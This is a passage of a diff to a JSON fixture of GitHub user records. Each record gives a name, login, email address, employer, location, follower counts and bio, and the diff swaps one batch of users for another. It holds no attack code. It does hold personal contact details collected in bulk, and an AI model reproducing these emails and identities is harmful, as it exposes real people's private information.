"2024-09-12T01:29:30.940Z", - "name": "Leif Lislegård", - "login": "lislei", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13136714?v=4", - "company": "Statens Kartverk ", - "location": "Hønefoss, Norway", + "nest_created_at": "2024-09-22T07:47:30.469Z", + "nest_updated_at": "2024-09-22T18:50:03.987Z", + "name": "Tanguy Krotoff", + "login": "tkrotoff", + "email": "tkrotoff@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/643434?v=4", + "company": "@Decathlon", + "location": "Paris", "collaborators_count": 0, - "following_count": 20, - "followers_count": 4, - "public_gists_count": 1, - "public_repositories_count": 15, - "created_at": "2015-07-01T14:29:54Z", - "updated_at": "2024-08-22T08:39:43Z", - "node_id": "MDQ6VXNlcjEzMTM2NzE0", + "following_count": 47, + "followers_count": 130, + "public_gists_count": 21, + "public_repositories_count": 112, + "created_at": "2011-02-28T21:03:45Z", + "updated_at": "2024-09-06T12:47:45Z", + "node_id": "MDQ6VXNlcjY0MzQzNA==", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "tkrotoff" } }, { "model": "github.user", - "pk": 1383, + "pk": 6660, "fields": { - "nest_created_at": "2024-09-11T23:24:16.249Z", - "nest_updated_at": "2024-09-12T01:27:12.765Z", - "name": "bovy89", - "login": "bovy89", - "email": "bovy89@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/697408?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:47:30.782Z", + "nest_updated_at": "2024-09-22T18:50:04.297Z", + "name": "Tim Suchanek", + "login": "timsuchanek", + "email": "Tim.Suchanek@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1094804?v=4", + "company": "expand.ai", + "location": "San Francisco", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 31, - "created_at": "2011-03-29T14:33:31Z", - "updated_at": "2024-05-17T12:23:58Z", - "node_id": "MDQ6VXNlcjY5NzQwOA==", - "bio": "", + "following_count": 223, + "followers_count": 736, + "public_gists_count": 27, + "public_repositories_count": 207, + "created_at": "2011-10-01T12:47:58Z", + "updated_at": "2024-09-06T02:54:43Z", + "node_id": "MDQ6VXNlcjEwOTQ4MDQ=", + "bio": "Founder of expand.ai\r\nPrev Co-founder Stellate\r\nPrev Founding Eng Prisma", "is_hireable": false, - "twitter_username": "" + "twitter_username": "timsuchanek" } }, { "model": "github.user", - "pk": 1384, + "pk": 6661, "fields": { - "nest_created_at": "2024-09-11T23:24:17.089Z", - "nest_updated_at": "2024-09-11T23:24:17.089Z", - "name": "Ronan Browne", - "login": "ronanbrowne", - "email": "ronanbrowne88@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5963044?v=4", - "company": "R3", - "location": "Dublin / Galway", + "nest_created_at": "2024-09-22T07:47:31.091Z", + "nest_updated_at": "2024-09-22T18:50:04.608Z", + "name": "Victoria Fawcett", + "login": "exvuma", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7578652?v=4", + "company": "@github ", + "location": "Austin", "collaborators_count": 0, - "following_count": 0, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 32, - "created_at": "2013-11-17T20:40:43Z", - "updated_at": "2024-09-04T11:23:40Z", - "node_id": "MDQ6VXNlcjU5NjMwNDQ=", - "bio": "DevOps Engineering Manager and Team Lead at R3. \r\n\r\n ", - "is_hireable": false, - "twitter_username": "" + "following_count": 10, + "followers_count": 57, + "public_gists_count": 13, + "public_repositories_count": 69, + "created_at": "2014-05-14T08:12:30Z", + "updated_at": "2024-09-03T14:54:42Z", + "node_id": "MDQ6VXNlcjc1Nzg2NTI=", + "bio": "Product at @github ", + "is_hireable": true, + "twitter_username": "exvuma" } }, { "model": "github.user", - "pk": 1385, + "pk": 6662, "fields": { - "nest_created_at": "2024-09-11T23:24:17.913Z", - "nest_updated_at": "2024-09-11T23:24:17.913Z", + "nest_created_at": "2024-09-22T07:47:31.406Z", + "nest_updated_at": "2024-09-22T18:50:04.927Z", "name": "", - "login": "AnonymousVovus", + "login": "alexmolev", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1920918?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6603327?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2012-07-04T06:23:02Z", - "updated_at": "2023-04-17T10:31:42Z", - "node_id": "MDQ6VXNlcjE5MjA5MTg=", + "public_repositories_count": 6, + "created_at": "2014-02-06T09:24:23Z", + "updated_at": "2024-05-26T06:06:00Z", + "node_id": "MDQ6VXNlcjY2MDMzMjc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394878,24 +652477,24 @@ }, { "model": "github.user", - "pk": 1386, + "pk": 6663, "fields": { - "nest_created_at": "2024-09-11T23:24:18.745Z", - "nest_updated_at": "2024-09-11T23:42:17.326Z", - "name": "", - "login": "spliffone", + "nest_created_at": "2024-09-22T07:47:31.728Z", + "nest_updated_at": "2024-09-22T18:50:05.234Z", + "name": "matt beary", + "login": "hauntingEcho", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12686268?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1661988?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2015-05-31T18:55:27Z", - "updated_at": "2024-08-20T18:08:26Z", - "node_id": "MDQ6VXNlcjEyNjg2MjY4", + "following_count": 3, + "followers_count": 3, + "public_gists_count": 3, + "public_repositories_count": 28, + "created_at": "2012-04-20T07:15:30Z", + "updated_at": "2024-05-31T21:02:48Z", + "node_id": "MDQ6VXNlcjE2NjE5ODg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -394903,124 +652502,149 @@ }, { "model": "github.user", - "pk": 1387, + "pk": 6664, "fields": { - "nest_created_at": "2024-09-11T23:24:22.574Z", - "nest_updated_at": "2024-09-11T23:24:24.230Z", - "name": "PJ Fanning", - "login": "pjfanning", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/11783444?v=4", + "nest_created_at": "2024-09-22T07:47:32.043Z", + "nest_updated_at": "2024-09-22T18:50:05.541Z", + "name": "Gandhali Karnik", + "login": "gakarnik", + "email": "gakarnik@microsoft.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3142100?v=4", "company": "", - "location": "Kilkenny, Ireland", + "location": "Redmond, WA", "collaborators_count": 0, - "following_count": 2, - "followers_count": 161, - "public_gists_count": 0, - "public_repositories_count": 350, - "created_at": "2015-04-03T08:56:14Z", - "updated_at": "2024-07-06T17:50:54Z", - "node_id": "MDQ6VXNlcjExNzgzNDQ0", - "bio": "Experienced developer with an interest in open source. Member of Apache Software Foundation.", + "following_count": 6, + "followers_count": 1, + "public_gists_count": 2, + "public_repositories_count": 11, + "created_at": "2012-12-28T13:47:23Z", + "updated_at": "2023-10-29T17:52:26Z", + "node_id": "MDQ6VXNlcjMxNDIxMDA=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1388, + "pk": 6665, "fields": { - "nest_created_at": "2024-09-11T23:24:23.404Z", - "nest_updated_at": "2024-09-11T23:24:23.404Z", - "name": "Tim van der Lippe", - "login": "TimvdLippe", + "nest_created_at": "2024-09-22T07:47:32.363Z", + "nest_updated_at": "2024-09-22T18:50:05.939Z", + "name": "Sean", + "login": "Smenus", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5948271?v=4", - "company": "Adyen", - "location": "The Netherlands", + "avatar_url": "https://avatars.githubusercontent.com/u/156526?v=4", + "company": "", + "location": "Crawley, UK", "collaborators_count": 0, - "following_count": 2, - "followers_count": 276, - "public_gists_count": 6, - "public_repositories_count": 180, - "created_at": "2013-11-15T13:40:59Z", - "updated_at": "2024-08-22T11:32:45Z", - "node_id": "MDQ6VXNlcjU5NDgyNzE=", - "bio": "@Mockito core developer,\r\n\r\nDevelopment tooling engineer @Adyen,\r\n\r\nex-Googler worked on @ChromeDevTools, @Polymer intern,\r\n\r\nopen source enthusiast", - "is_hireable": true, + "following_count": 8, + "followers_count": 13, + "public_gists_count": 7, + "public_repositories_count": 16, + "created_at": "2009-11-21T23:52:46Z", + "updated_at": "2024-07-29T16:03:37Z", + "node_id": "MDQ6VXNlcjE1NjUyNg==", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1389, + "pk": 6666, "fields": { - "nest_created_at": "2024-09-11T23:24:25.115Z", - "nest_updated_at": "2024-09-11T23:24:25.115Z", - "name": "", - "login": "fxigit", + "nest_created_at": "2024-09-22T07:47:32.682Z", + "nest_updated_at": "2024-09-22T18:50:06.259Z", + "name": "Lucas Azzola", + "login": "azz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/113127774?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1297597?v=4", + "company": "@up-banking", + "location": "Melbourne, Australia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-09-08T16:10:34Z", - "updated_at": "2022-09-08T16:10:34Z", - "node_id": "U_kgDOBr4xXg", - "bio": "", + "following_count": 75, + "followers_count": 356, + "public_gists_count": 29, + "public_repositories_count": 138, + "created_at": "2012-01-01T16:48:17Z", + "updated_at": "2024-08-20T20:17:09Z", + "node_id": "MDQ6VXNlcjEyOTc1OTc=", + "bio": "\r\n Full Stack Software Engineer, JavaScript enthusiast.\r\n", "is_hireable": false, - "twitter_username": "" + "twitter_username": "lucasazzola" } }, { "model": "github.user", - "pk": 1390, + "pk": 6667, "fields": { - "nest_created_at": "2024-09-11T23:24:25.923Z", - "nest_updated_at": "2024-09-11T23:24:25.923Z", - "name": "Markus Duft", - "login": "mduft", - "email": "markus.duft@ssi-schaefer.com", - "avatar_url": "https://avatars.githubusercontent.com/u/533793?v=4", - "company": "SSI Schaefer IT Solutions GmbH", - "location": "Friesach bei Graz, Austria", + "nest_created_at": "2024-09-22T07:47:32.993Z", + "nest_updated_at": "2024-09-22T18:50:06.565Z", + "name": "Christian Liebel", + "login": "christianliebel", + "email": "christian.liebel@thinktecture.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6698344?v=4", + "company": "@thinktecture ", + "location": "Leimersheim, Germany", "collaborators_count": 0, - "following_count": 1, - "followers_count": 14, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2010-12-22T20:54:55Z", - "updated_at": "2024-08-28T09:17:46Z", - "node_id": "MDQ6VXNlcjUzMzc5Mw==", - "bio": "", + "following_count": 12, + "followers_count": 169, + "public_gists_count": 1, + "public_repositories_count": 91, + "created_at": "2014-02-16T19:20:28Z", + "updated_at": "2024-09-19T15:19:47Z", + "node_id": "MDQ6VXNlcjY2OTgzNDQ=", + "bio": "PWA enthusiast. GDE Angular/Web Capabilities, MVP Developer Technologies, W3C WebApps WG participant.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "christianliebel" } }, { "model": "github.user", - "pk": 1391, + "pk": 6668, "fields": { - "nest_created_at": "2024-09-11T23:24:26.746Z", - "nest_updated_at": "2024-09-12T01:29:16.115Z", - "name": "", - "login": "taicomjp", + "nest_created_at": "2024-09-22T07:47:33.310Z", + "nest_updated_at": "2024-09-22T18:50:06.872Z", + "name": "Andrew Branch", + "login": "andrewbranch", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3759726?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3277153?v=4", + "company": "Microsoft", + "location": "San Rafael", + "collaborators_count": 0, + "following_count": 26, + "followers_count": 505, + "public_gists_count": 22, + "public_repositories_count": 86, + "created_at": "2013-01-15T16:46:11Z", + "updated_at": "2024-09-06T16:06:49Z", + "node_id": "MDQ6VXNlcjMyNzcxNTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "atcb" + } +}, +{ + "model": "github.user", + "pk": 6669, + "fields": { + "nest_created_at": "2024-09-22T07:47:33.619Z", + "nest_updated_at": "2024-09-22T18:50:07.239Z", + "name": "Andrew Bradley", + "login": "cspotcode", + "email": "cspotcode@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/376504?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2013-03-04T01:32:59Z", - "updated_at": "2024-09-05T07:27:18Z", - "node_id": "MDQ6VXNlcjM3NTk3MjY=", + "following_count": 4, + "followers_count": 128, + "public_gists_count": 29, + "public_repositories_count": 336, + "created_at": "2010-08-26T05:50:12Z", + "updated_at": "2024-09-06T21:00:14Z", + "node_id": "MDQ6VXNlcjM3NjUwNA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -395028,24 +652652,24 @@ }, { "model": "github.user", - "pk": 1392, + "pk": 6670, "fields": { - "nest_created_at": "2024-09-11T23:24:29.210Z", - "nest_updated_at": "2024-09-11T23:24:29.210Z", - "name": "", - "login": "xiang123abc", + "nest_created_at": "2024-09-22T07:47:33.926Z", + "nest_updated_at": "2024-09-22T18:50:07.549Z", + "name": "David Hamberlin", + "login": "dhamberlin", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/36296072?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/25755829?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2018-02-09T09:53:42Z", - "updated_at": "2024-07-12T05:49:10Z", - "node_id": "MDQ6VXNlcjM2Mjk2MDcy", + "following_count": 1, + "followers_count": 6, + "public_gists_count": 1, + "public_repositories_count": 38, + "created_at": "2017-02-13T22:39:23Z", + "updated_at": "2024-06-26T04:55:26Z", + "node_id": "MDQ6VXNlcjI1NzU1ODI5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -395053,124 +652677,124 @@ }, { "model": "github.user", - "pk": 1393, + "pk": 6671, "fields": { - "nest_created_at": "2024-09-11T23:24:30.047Z", - "nest_updated_at": "2024-09-11T23:24:30.047Z", - "name": "Edward van Raak", - "login": "EdwardvanRaak", - "email": "edward.vanraak@nedap.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1560465?v=4", - "company": "Nedap", - "location": "Netherlands", + "nest_created_at": "2024-09-22T07:47:34.236Z", + "nest_updated_at": "2024-09-22T18:50:07.852Z", + "name": "Eilon Lipton", + "login": "Eilon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/202643?v=4", + "company": "Microsoft", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 16, - "public_gists_count": 6, - "public_repositories_count": 10, - "created_at": "2012-03-21T10:20:15Z", - "updated_at": "2024-08-30T11:41:49Z", - "node_id": "MDQ6VXNlcjE1NjA0NjU=", - "bio": "Android Developer \r\n\r\n@ Nedap Healthcare", + "followers_count": 695, + "public_gists_count": 3, + "public_repositories_count": 84, + "created_at": "2010-02-12T18:49:41Z", + "updated_at": "2024-09-11T17:01:35Z", + "node_id": "MDQ6VXNlcjIwMjY0Mw==", + "bio": "Ask me about .NET!", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1394, + "pk": 6672, "fields": { - "nest_created_at": "2024-09-11T23:24:31.286Z", - "nest_updated_at": "2024-09-11T23:24:31.286Z", - "name": "Allen Fisher", - "login": "allenfisher", - "email": "allen.fisher@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1399385?v=4", - "company": "Stelligent", - "location": "California", + "nest_created_at": "2024-09-22T07:47:34.551Z", + "nest_updated_at": "2024-09-22T18:50:08.178Z", + "name": "ExE Boss", + "login": "ExE-Boss", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3889017?v=4", + "company": "@EB-Tech", + "location": "The Bird Dimension", "collaborators_count": 0, - "following_count": 2, - "followers_count": 18, - "public_gists_count": 3, - "public_repositories_count": 3, - "created_at": "2012-02-01T20:34:28Z", - "updated_at": "2023-10-02T15:57:42Z", - "node_id": "MDQ6VXNlcjEzOTkzODU=", - "bio": " CI and DevOps Engineer. I make it go automagically. If you can do it more than once, I can automate it.", + "following_count": 49, + "followers_count": 93, + "public_gists_count": 4, + "public_repositories_count": 106, + "created_at": "2013-03-17T09:07:22Z", + "updated_at": "2024-08-28T11:26:17Z", + "node_id": "MDQ6VXNlcjM4ODkwMTc=", + "bio": "", "is_hireable": false, - "twitter_username": "allen_fisher" + "twitter_username": "ExE_Boss" } }, { "model": "github.user", - "pk": 1395, + "pk": 6673, "fields": { - "nest_created_at": "2024-09-11T23:24:32.107Z", - "nest_updated_at": "2024-09-11T23:24:32.107Z", - "name": "BonusLord", - "login": "BonusLord", + "nest_created_at": "2024-09-22T07:47:34.863Z", + "nest_updated_at": "2024-09-22T18:50:08.486Z", + "name": "Glen", + "login": "glen-84", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5925424?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/261509?v=4", "company": "", - "location": "", + "location": "Cape Town, South Africa", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, - "public_gists_count": 1, - "public_repositories_count": 3, - "created_at": "2013-11-13T03:11:36Z", - "updated_at": "2024-07-24T00:12:56Z", - "node_id": "MDQ6VXNlcjU5MjU0MjQ=", + "followers_count": 20, + "public_gists_count": 13, + "public_repositories_count": 59, + "created_at": "2010-05-01T19:12:57Z", + "updated_at": "2024-08-06T13:15:22Z", + "node_id": "MDQ6VXNlcjI2MTUwOQ==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1396, + "pk": 6674, "fields": { - "nest_created_at": "2024-09-11T23:24:32.956Z", - "nest_updated_at": "2024-09-11T23:24:32.956Z", - "name": "言小川", - "login": "yanxiaochuan", - "email": "993496032@qq.com", - "avatar_url": "https://avatars.githubusercontent.com/u/7532142?v=4", + "nest_created_at": "2024-09-22T07:47:35.177Z", + "nest_updated_at": "2024-09-22T18:50:08.815Z", + "name": "Ika", + "login": "ikatyang", + "email": "ikatyang@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8341033?v=4", "company": "", - "location": "霸都", + "location": "Hsinchu, Taiwan", "collaborators_count": 0, - "following_count": 5, - "followers_count": 3, + "following_count": 36, + "followers_count": 3064, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2014-05-09T08:42:54Z", - "updated_at": "2024-08-13T13:21:51Z", - "node_id": "MDQ6VXNlcjc1MzIxNDI=", - "bio": "夫君子之行,静以修身,俭以养德。非淡泊无以明志,非宁静无以致远", + "public_repositories_count": 77, + "created_at": "2014-08-03T03:47:19Z", + "updated_at": "2024-09-04T11:25:04Z", + "node_id": "MDQ6VXNlcjgzNDEwMzM=", + "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ikatyang_" } }, { "model": "github.user", - "pk": 1397, + "pk": 6675, "fields": { - "nest_created_at": "2024-09-11T23:24:33.761Z", - "nest_updated_at": "2024-09-11T23:24:33.761Z", - "name": "Alexander Dietzsch", - "login": "dietzsch", - "email": "alexander.dietzsch@de.bosch.com", - "avatar_url": "https://avatars.githubusercontent.com/u/7125386?v=4", - "company": "Robert Bosch GmbH", - "location": "Stuttgart", + "nest_created_at": "2024-09-22T07:47:35.506Z", + "nest_updated_at": "2024-09-22T18:50:09.145Z", + "name": "Jacob", + "login": "jacobq", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1633459?v=4", + "company": "", + "location": "Minneapolis, Minnesota, USA", "collaborators_count": 0, - "following_count": 2, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2014-04-01T09:41:38Z", - "updated_at": "2024-06-20T07:58:55Z", - "node_id": "MDQ6VXNlcjcxMjUzODY=", + "following_count": 70, + "followers_count": 32, + "public_gists_count": 40, + "public_repositories_count": 185, + "created_at": "2012-04-11T14:54:13Z", + "updated_at": "2024-09-13T01:39:17Z", + "node_id": "MDQ6VXNlcjE2MzM0NTk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -395178,24 +652802,24 @@ }, { "model": "github.user", - "pk": 1398, + "pk": 6676, "fields": { - "nest_created_at": "2024-09-11T23:24:34.610Z", - "nest_updated_at": "2024-09-11T23:24:34.610Z", - "name": "Devin Smith", - "login": "devinrsmith", + "nest_created_at": "2024-09-22T07:47:35.828Z", + "nest_updated_at": "2024-09-22T18:50:09.497Z", + "name": "Jan Brohl", + "login": "janbrohl", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6764691?v=4", - "company": "Deephaven Data Labs", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1873458?v=4", + "company": "@baloise ", + "location": "Germany", "collaborators_count": 0, - "following_count": 38, - "followers_count": 24, - "public_gists_count": 25, - "public_repositories_count": 132, - "created_at": "2014-02-23T18:53:26Z", - "updated_at": "2024-09-06T03:48:20Z", - "node_id": "MDQ6VXNlcjY3NjQ2OTE=", + "following_count": 1, + "followers_count": 1, + "public_gists_count": 5, + "public_repositories_count": 33, + "created_at": "2012-06-20T17:52:50Z", + "updated_at": "2024-06-15T09:06:40Z", + "node_id": "MDQ6VXNlcjE4NzM0NTg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -395203,74 +652827,74 @@ }, { "model": "github.user", - "pk": 1399, + "pk": 6677, "fields": { - "nest_created_at": "2024-09-11T23:24:35.432Z", - "nest_updated_at": "2024-09-11T23:24:35.432Z", - "name": "Matija Vrbovšek", - "login": "mindhacker42", - "email": "matija.vrbovsek@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1517773?v=4", - "company": "Kamino d.o.o.", - "location": "Maribor, Slovenia", + "nest_created_at": "2024-09-22T07:47:36.176Z", + "nest_updated_at": "2024-09-22T18:50:09.818Z", + "name": "Jesper Jeeninga", + "login": "moxventura", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23724638?v=4", + "company": "", + "location": "Netherlands", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, + "following_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2012-03-08T20:57:45Z", - "updated_at": "2024-02-19T17:02:59Z", - "node_id": "MDQ6VXNlcjE1MTc3NzM=", - "bio": "", + "public_repositories_count": 23, + "created_at": "2016-11-24T15:39:28Z", + "updated_at": "2024-06-10T19:06:52Z", + "node_id": "MDQ6VXNlcjIzNzI0NjM4", + "bio": "Lead Quality Engineer", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1400, + "pk": 6678, "fields": { - "nest_created_at": "2024-09-11T23:24:37.871Z", - "nest_updated_at": "2024-09-11T23:24:37.871Z", - "name": "Sam Gammon", - "login": "sgammon", - "email": "sam@elide.dev", - "avatar_url": "https://avatars.githubusercontent.com/u/171897?v=4", - "company": "@elide-dev / @buildless", - "location": "San Francisco, California", - "collaborators_count": 0, - "following_count": 661, - "followers_count": 163, - "public_gists_count": 79, - "public_repositories_count": 274, - "created_at": "2009-12-24T21:58:12Z", - "updated_at": "2024-06-24T23:50:44Z", - "node_id": "MDQ6VXNlcjE3MTg5Nw==", - "bio": "", + "nest_created_at": "2024-09-22T07:47:36.487Z", + "nest_updated_at": "2024-09-22T18:50:10.140Z", + "name": "JounQin", + "login": "JounQin", + "email": "admin@1stg.me", + "avatar_url": "https://avatars.githubusercontent.com/u/8336744?v=4", + "company": "@Alauda", + "location": "Nanjing, Jiangsu, PRC", + "collaborators_count": 0, + "following_count": 239, + "followers_count": 582, + "public_gists_count": 3, + "public_repositories_count": 96, + "created_at": "2014-08-02T09:54:42Z", + "updated_at": "2024-08-23T11:32:10Z", + "node_id": "MDQ6VXNlcjgzMzY3NDQ=", + "bio": "轮子主义初级阶段 v0.0.1 @1stG.me\r\nWrite Less, Think More.\r\n", "is_hireable": false, - "twitter_username": "elide_sg" + "twitter_username": "JounQin" } }, { "model": "github.user", - "pk": 1401, + "pk": 6679, "fields": { - "nest_created_at": "2024-09-11T23:24:39.077Z", - "nest_updated_at": "2024-09-12T01:29:01.929Z", - "name": "Suraj Rk ", - "login": "tech-surajrk", + "nest_created_at": "2024-09-22T07:47:37.187Z", + "nest_updated_at": "2024-09-22T18:50:10.890Z", + "name": "Katy Shimizu", + "login": "kashimiz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/112088960?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17170862?v=4", + "company": "Microsoft", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 37, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-08-25T12:25:44Z", - "updated_at": "2024-03-01T14:59:16Z", - "node_id": "U_kgDOBq5XgA", + "public_repositories_count": 28, + "created_at": "2016-02-11T02:24:27Z", + "updated_at": "2023-12-13T15:06:16Z", + "node_id": "MDQ6VXNlcjE3MTcwODYy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -395278,24 +652902,24 @@ }, { "model": "github.user", - "pk": 1402, + "pk": 6680, "fields": { - "nest_created_at": "2024-09-11T23:24:39.894Z", - "nest_updated_at": "2024-09-11T23:24:39.894Z", - "name": "", - "login": "TheoLassonder", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/756274?v=4", + "nest_created_at": "2024-09-22T07:47:37.494Z", + "nest_updated_at": "2024-09-22T18:50:11.209Z", + "name": "Kelly Fam", + "login": "kfam98", + "email": "kellyfam@microsoft.com", + "avatar_url": "https://avatars.githubusercontent.com/u/29488088?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 2, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2011-04-28T06:04:47Z", - "updated_at": "2024-07-24T08:03:16Z", - "node_id": "MDQ6VXNlcjc1NjI3NA==", + "public_repositories_count": 11, + "created_at": "2017-06-16T16:45:41Z", + "updated_at": "2024-07-09T22:44:21Z", + "node_id": "MDQ6VXNlcjI5NDg4MDg4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -395303,24 +652927,24 @@ }, { "model": "github.user", - "pk": 1403, + "pk": 6681, "fields": { - "nest_created_at": "2024-09-11T23:24:41.589Z", - "nest_updated_at": "2024-09-11T23:24:41.589Z", - "name": "", - "login": "markjeffreymiller", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3987788?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T07:47:37.814Z", + "nest_updated_at": "2024-09-22T18:50:11.517Z", + "name": "Martin Aeschlimann", + "login": "aeschli", + "email": "martinae@microsoft.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6461412?v=4", + "company": "Microsoft", + "location": "Switzerland", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2013-03-27T18:11:42Z", - "updated_at": "2024-04-13T05:09:45Z", - "node_id": "MDQ6VXNlcjM5ODc3ODg=", + "followers_count": 387, + "public_gists_count": 11, + "public_repositories_count": 77, + "created_at": "2014-01-21T15:03:54Z", + "updated_at": "2024-09-16T11:28:58Z", + "node_id": "MDQ6VXNlcjY0NjE0MTI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -395328,124 +652952,199 @@ }, { "model": "github.user", - "pk": 1404, + "pk": 6682, "fields": { - "nest_created_at": "2024-09-11T23:24:42.893Z", - "nest_updated_at": "2024-09-11T23:24:42.893Z", - "name": "Stefan", - "login": "stefan-g", + "nest_created_at": "2024-09-22T07:47:38.122Z", + "nest_updated_at": "2024-09-22T18:50:11.872Z", + "name": "Mathieu Dutour", + "login": "mathieudutour", + "email": "mathieu@dutour.me", + "avatar_url": "https://avatars.githubusercontent.com/u/3254314?v=4", + "company": "@raycast", + "location": "¯\\_(ツ)_/¯", + "collaborators_count": 0, + "following_count": 53, + "followers_count": 1322, + "public_gists_count": 7, + "public_repositories_count": 204, + "created_at": "2013-01-12T21:41:58Z", + "updated_at": "2024-09-22T12:28:00Z", + "node_id": "MDQ6VXNlcjMyNTQzMTQ=", + "bio": "Build things. Nomad.", + "is_hireable": true, + "twitter_username": "mathieudutour" + } +}, +{ + "model": "github.user", + "pk": 6683, + "fields": { + "nest_created_at": "2024-09-22T07:47:38.430Z", + "nest_updated_at": "2024-09-22T18:50:12.177Z", + "name": "Oscar Busk", + "login": "oBusk", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20639060?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13413409?v=4", + "company": "@Silobreaker ", + "location": "Stockholm", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2016-07-25T09:23:58Z", - "updated_at": "2024-09-01T11:34:41Z", - "node_id": "MDQ6VXNlcjIwNjM5MDYw", - "bio": "", + "following_count": 1, + "followers_count": 19, + "public_gists_count": 3, + "public_repositories_count": 76, + "created_at": "2015-07-20T07:07:35Z", + "updated_at": "2024-08-26T21:28:23Z", + "node_id": "MDQ6VXNlcjEzNDEzNDA5", + "bio": "\r\n Frontend developer at @Silobreaker. Plays around with useless stuff on my freetime.\r\n", "is_hireable": false, - "twitter_username": "" + "twitter_username": "nullDozzer" } }, { "model": "github.user", - "pk": 1405, + "pk": 6684, "fields": { - "nest_created_at": "2024-09-11T23:24:44.105Z", - "nest_updated_at": "2024-09-11T23:24:44.105Z", - "name": "Tyler Crawford", - "login": "tcrawford-figure", + "nest_created_at": "2024-09-22T07:47:38.745Z", + "nest_updated_at": "2024-09-22T18:50:12.486Z", + 